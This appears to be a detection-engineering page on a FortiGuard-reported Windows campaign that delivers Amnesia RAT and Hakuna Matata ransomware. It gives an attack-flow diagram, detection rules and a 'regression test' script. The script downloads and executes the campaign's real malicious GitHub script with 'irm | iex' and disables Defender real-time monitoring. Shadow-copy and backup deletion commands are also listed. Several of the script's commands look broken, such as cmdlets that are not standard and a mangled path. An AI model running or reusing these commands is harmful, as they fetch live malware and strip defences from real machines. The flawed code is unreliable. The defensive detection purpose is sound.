Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
FortiGuard Labs identified a multi-stage Windows intrusion chain that starts with a malicious LNK file delivered inside a compressed archive. The shortcut launches an initial PowerShell loader that pulls follow-on scripts from GitHub and later hands control to an obfuscated VBScript orchestrator. The workflow then attempts to weaken endpoint defenses by disabling Microsoft Defender, deploying the Defendnot utility, and staging both Amnesia RAT and Hakuna Matata ransomware. The operation concludes by dropping a WinLocker component that locks the desktop to disrupt recovery and pressure victims.
Investigation
Investigators reconstructed the execution path from the LNK-triggered PowerShell stage to a VBScript that rebuilds payloads in memory, culminating in ransomware deployment and desktop-locking behavior. Defensive measures were bypassed through targeted registry edits and by injecting a Defendnot DLL into Taskmgr.exe. Persistence was implemented using a combination of Run key entries and Startup folder artifacts to re-trigger the chain after logon.
Mitigation
Monitor for suspicious policy-level registry changes under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender and HKCU\Software\Microsoft\Windows\CurrentVersion\Policies. Block egress to known malicious GitHub and Dropbox URLs used for staging, and alert on PowerShell download-and-execute patterns originating from LNK launches. Enforce application allow-listing and tighten PowerShell execution controls to reduce script-based initial access.
Response
If detected, isolate the endpoint, restore Defender-related registry settings to a known-good state, and remove malicious files and persistence entries. Hunt for active Amnesia RAT processes and associated network activity, and validate whether ransomware execution occurred. Perform full forensic triage to scope impact and eradicate remnants, then recover systems from clean backups where feasible.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff6666 %% Node definitions step_a["<b>Action</b> – <b>T1566.001 Phishing: Attachment</b><br/>LNK file 'u0417u0430u0434u0430u043du0438u0435_u0434u043bu044f_u0431u0443u0445u0433u0430u043bu0442u0435u0440u0430_02u043eu0442u0434u0435u043bu0430.txt.lnk' inside a compressed archive"] class step_a action step_b["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>LNK launches PowerShell with -ExecutionPolicy Bypass to download script 'kira.ps1'"] class step_b action step_c["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/>VBScript 'SCRRC4ryuk.vbe' encoded with Script Encoder Plus, Base64 and RC4"] class step_c action step_d["<b>Action</b> – <b>T1562.001 Impair Defenses</b><br/>PowerShell disables Microsoft Defender realu2011time monitoring and adds wide filesystem exclusions"] class step_d action step_e["<b>Action</b> – <b>T1218.010 Regsvr32 Proxy Execution</b><br/>Defendnot DLL and loader deployed, injected into trusted Taskmgr.exe"] class step_e action step_f["<b>Action</b> – <b>T1548.002 Bypass UAC</b><br/>ShellExecute runas loop used to obtain elevated rights"] class step_f action step_g["<b>Action</b> – <b>T1547.001 Registry Run Keys / Startup Folder</b><br/>Creates HKCU\Software\Microsoft\Windows\CurrentVersion\Run entry and copies 'svchost.scr' to %PROGRAMDATA% and user Startup folder"] class step_g action step_h["<b>Action</b> – <b>T1082 System Information Discovery</b><br/>Collects OS, hardware, domain, IP information via WMI"] class step_h action step_i["<b>Action</b> – <b>T1057 Process Discovery</b><br/>Enumerates running processes to avoid duplicate execution"] class step_i action step_j["<b>Action</b> – <b>T1113 Screen Capture</b><br/>'TelegramWorker.scr' captures screenshots (1.pngu201130.png) and sends them via Telegram"] class step_j action step_k["<b>Action</b> – <b>T1555 Credentials from Password Stores</b><br/>Extracts Chromium browser passwords and cookies using DPAPI"] class step_k action step_l["<b>Action</b> – <b>T1539 Steal Web Session Cookie</b><br/>Harvests cookies and tokens from browsers"] class step_l action step_m["<b>Action</b> – <b>T1550.004 Use Alternate Authentication Material</b><br/>Hijacks Telegram Desktop session files from 'tdata'"] class step_m action step_n["<b>Action</b> – <b>T1102.002 Web Service</b><br/>Sends collected data and screenshots to attacker via Telegram Bot API"] class step_n action step_o["<b>Malware</b> – <b>T1486 Data Encrypted for Impact</b><br/>Hakuna Matata ransomware 'WmiPrvSE.scr' encrypts files with extension @NeverMind12F"] class step_o malware step_p["<b>Action</b> – <b>T1490 Inhibit System Recovery</b><br/>Executes 'reagentc /disable', 'wbadmin delete catalog', 'vssadmin delete shadows /all'"] class step_p action step_q["<b>Malware</b> – <b>T1499 Endpoint Denial of Service</b><br/>WinLocker 'gedion.scr' creates mutex WINLOCK… and locks the desktop"] class step_q malware %% Connections step_a –>|leads_to| step_b step_b –>|leads_to| step_c step_c –>|leads_to| step_d step_d –>|leads_to| step_e step_e –>|leads_to| step_f step_f –>|leads_to| step_g step_g –>|leads_to| step_h step_h –>|leads_to| step_i step_i –>|leads_to| step_j step_j –>|leads_to| step_k step_k –>|leads_to| step_l step_l –>|leads_to| step_m step_m –>|leads_to| step_n step_n –>|leads_to| step_o step_o –>|leads_to| step_p step_p –>|leads_to| step_q "
Attack Flow
Detections
Suspicious Process Utilizes a URL in the Command Line (via cmdline)
View
Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
View
IOCs (HashSha256) to detect: Inside a Multi-Stage Windows Malware Campaign
View
Malicious Network Activity and C2 via GitHub, Dropbox, Telegram [Windows Network Connection]
View
Windows Malware Campaign PowerShell Execution [Windows Powershell]
View
PowerShell and CMD Execution with Install.exe Decoy [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
An adversary who has gained initial foothold on the endpoint wishes to download and execute a malicious PowerShell payload while evading the default execution policy. They useInvoke‑Expression(iex) combined withInvoke‑WebRequest(irm) to pull a script from a remote GitHub raw URL, running it under-ExecutionPolicy Bypass. After establishing persistence, they disable Windows Defender real‑time monitoring to avoid detection of subsequent payloads. These steps directly generate the command‑line strings that the Sigma rule watches for. -
Regression Test Script:
# -------------------------------------------------------------- # Step 1 – Execute remote script with ExecutionPolicy Bypass # -------------------------------------------------------------- $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1" powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex" # -------------------------------------------------------------- # Step 2 – Disable Windows Defender real‑time monitoring # -------------------------------------------------------------- # Disable real‑time protection Disable-MpPreference -DisableRealtimeMonitoring $true # Add an exclusion path (simulated) Add-MpPreference -ExclusionPath "C:TempExcludeFolder" -
Cleanup Commands:
# Re‑enable Windows Defender real‑time monitoring Enable-MpPreference -DisableRealtimeMonitoring $false # Remove the exclusion path (if it exists) Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue # Stop any lingering PowerShell processes started by the script Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force